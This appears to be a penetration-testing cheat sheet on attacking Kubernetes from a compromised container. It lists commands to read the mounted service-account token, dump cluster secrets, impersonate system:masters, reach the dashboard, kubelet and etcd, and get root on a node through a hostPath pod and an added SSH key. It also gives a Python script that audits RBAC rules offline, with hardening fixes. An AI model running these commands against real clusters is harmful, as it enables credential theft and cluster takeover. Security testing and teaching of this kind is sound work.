Compromised Container

Access to Container

NCC Attack Chain / Pentest process

In addition to this page, review: Deep Dive into Real-World Kubernetes Threats

Install custom tools (and prove Internet access)
  • curl -sLO https://storage.googleapis.com/kubernetes-release/release/v1.8.4/bin/linux/amd64/kubectl
  • chmod +x kubectl
  • mv kubectl /bin
Obtain the default ServiceAccount token
  • ls /var/run/secrets/kubernetes.io/serviceaccount/
    ca.pem namespace token
  • TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
  • CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
  • NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
Find API server IP and interact with curl
  • env | grep KUBE
    KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT are injected into every pod
  • K8S=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT
  • curl -H "Authorization: Bearer $TOKEN" --cacert $CACERT $K8S/healthz
    (/healthz is served at the API root, not under /api/v1/namespaces/)
  • curl -H "Authorization: Bearer $TOKEN" --cacert $CACERT $K8S/api/v1/namespaces/$NAMESPACE/pods
Interact with kubectl
  • kubectl --token=$TOKEN get nodes
    (nodes are cluster-scoped, so --all-namespaces does nothing here; without a kubeconfig, kubectl inside a pod falls back to the in-cluster server address and CA)
Obtain all secrets
  • Obtain Service Account Token
    • $ read TOKEN < <(kubectl -n default describe secrets $(kubectl -n default get secrets | awk '/SANAME/ {print $1}') | awk '/token:/ {print $2}')
  • Obtain master IP
    • $ kubectl cluster-info
      Kubernetes master is running at MASTER-IP:8443
  • Check that TOKEN can list secrets in default namespace
    • $ curl -k -v -H "Authorization: Bearer <jwt_token>" -H "Content-Type: application/json" https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r '.items[].data'
Impersonate privileged account
  • kubectl get secrets --as=null --as-group=system:masters
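Added example (not part of the NCC notes above): before using a mounted token, read its claims to learn which identity the pod actually holds, then evaluate the RBAC rules bound to that identity for the permissions this chain depends on (listing secrets, impersonation, creating pods). The token and the rule set are constructed samples in the shape the kubelet mounts and `kubectl get role -o json` returns; the signature is a dummy and is never verified, and the matching ignores `resourceNames` and `nonResourceURLs`. On a live cluster `kubectl auth can-i --list` gives the authoritative answer; this is the same wildcard logic applied offline to a rule dump.

```python
import base64
import json


def _b64url(obj: dict) -> str:
    """Encode a dict as unpadded base64url, as JWT segments are."""
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Constructed sample token: header.payload.signature with a dummy signature.
SAMPLE_TOKEN = ".".join([
    _b64url({"alg": "RS256", "kid": "example"}),
    _b64url({
        "iss": "kubernetes/serviceaccount",
        "kubernetes.io/serviceaccount/namespace": "default",
        "kubernetes.io/serviceaccount/service-account.name": "default",
        "sub": "system:serviceaccount:default:default",
    }),
    "dummysignature",
])

# Constructed sample rules, the .rules of a Role bound to that identity.
SAMPLE_RULES = [
    {"apiGroups": [""], "resources": ["pods", "pods/log"], "verbs": ["get", "list", "watch"]},
    {"apiGroups": [""], "resources": ["secrets"], "verbs": ["list"]},
    {"apiGroups": ["*"], "resources": ["pods"], "verbs": ["create", "delete"]},
]


def decode_sa_token(token: str) -> dict:
    """Return the (unverified) claims of a service-account JWT."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)  # restore base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))


def sa_identity(token: str):
    """(namespace, service-account name) the pod runs as."""
    claims = decode_sa_token(token)
    return (claims["kubernetes.io/serviceaccount/namespace"],
            claims["kubernetes.io/serviceaccount/service-account.name"])


def rule_allows(rule: dict, api_group: str, resource: str, verb: str) -> bool:
    """RBAC matching: '*' is a wildcard in apiGroups, resources and verbs."""
    def match(values, wanted):
        return "*" in values or wanted in values
    return (match(rule.get("apiGroups", []), api_group)
            and match(rule.get("resources", []), resource)
            and match(rule.get("verbs", []), verb))


def can(rules, api_group: str, resource: str, verb: str) -> bool:
    """Any single rule granting the triple is enough (RBAC is purely additive)."""
    return any(rule_allows(r, api_group, resource, verb) for r in rules)


# Permissions the chain on this page relies on, as (apiGroup, resource, verb).
RISKY_PERMISSIONS = [
    ("", "secrets", "list"),
    ("", "secrets", "get"),
    ("", "users", "impersonate"),
    ("", "groups", "impersonate"),
    ("", "pods", "create"),  # needed to schedule a pod with a hostPath mount
]


def audit(rules) -> list:
    """List the risky permissions the rule set grants, e.g. ['list secrets']."""
    return [f"{verb} {resource}"
            for group, resource, verb in RISKY_PERMISSIONS
            if can(rules, group, resource, verb)]


if __name__ == "__main__":
    ns, name = sa_identity(SAMPLE_TOKEN)
    print(f"token identity: system:serviceaccount:{ns}:{name}")
    for finding in audit(SAMPLE_RULES):
        print(f"over-privileged: can {finding}")
```

With the constructed rules the report shows the identity `system:serviceaccount:default:default` and flags `list secrets` and `create pods`; a default token in a namespace whose Role looks like this is the condition every later step on this page assumes, so `automountServiceAccountToken: false` on pods that never talk to the API, and Roles without `secrets`/`impersonate`, are the corresponding fixes.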

Dashboard/APIs

Direct Dashboard Access
  • curl -s http://kubernetes-dashboard.kube-system
Direct APIs Access
  • kubectl get --raw=/api | jq .serverAddressByClientCIDRs[0].serverAddress -r
    192.168.64.11:6443
  • curl -sk https://192.168.64.11:6443
    (the API server speaks TLS on 6443; a plain http:// request only returns "Client sent an HTTP request to an HTTPS server")
Access the Kubelet API (kubelet-exploit)
  • See Kubelet Exploit

Network

Port Scan
  • See Network page
Access Other Services Inside the Cluster Directly
  • redis-cli -h redis-master.default

ETCD

Direct ETCD Access (and obtain root on underlying node)
  1. Obtain Kubelet or higher SA Token
  2. Schedule a Pod & mount the host filesystem
  3. Add SSH Key
  4. SSH Into Node
  • $ curl -s http://<kubernetes-IP>:2379/v2/keys/?recursive=true
Direct ETCD Access (review the content)
  1. Obtain a copy of etcdctl
  2. Query the API
  3. Review/dump the content
  $ curl -sLO https://github.com/coreos/etcd/releases/download/v3.1.5/etcd-v3.1.5-linux-amd64.tar.gz
  $ tar xzf etcd-v3.1.5-linux-amd64.tar.gz   # the release archive ships etcdctl next to etcd
  # Query the API - v2 (K8s <= 1.5)
  #    And explore the config
  #    /registry/secrets/default may contain the default service token
  $ etcdctl --endpoint=http://[etcd_server_ip]:2379 ls

  # Query the API - v3
  #   Dump an instance of the etcd database to a file on disk
  #   Read the file with: https://github.com/br0xen/boltbrowser
  $ export ETCDCTL_API=3
  $ etcdctl --endpoints=http://[etcd_server_ip]:2379 snapshot save snapshot.db